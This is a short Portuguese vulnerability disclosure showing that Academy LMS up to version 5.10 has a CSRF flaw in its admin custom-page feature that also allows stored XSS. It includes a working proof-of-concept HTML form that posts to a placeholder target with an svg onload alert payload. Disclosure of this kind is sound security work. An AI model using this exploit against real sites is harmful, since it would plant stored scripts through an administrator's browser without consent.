
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS é um aplicativo onde as pessoas podem criar e divulgar cursos. O recurso de adicionar uma nova página é vulnerável a CSRF, pois não há token que evite esse ataque. Além disso, essa página pode ser usada para carregar um payload de XSS armazenado.
O primeiro passo da nossa prova de conceito é autenticar na plataforma com um usuário administrativo.
Depois disso, basta acessar a página que contém o código para explorar a vulnerabilidade; veja que um novo botão será adicionado à página inicial do site, redirecionando para a página xss.
Código usado no exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>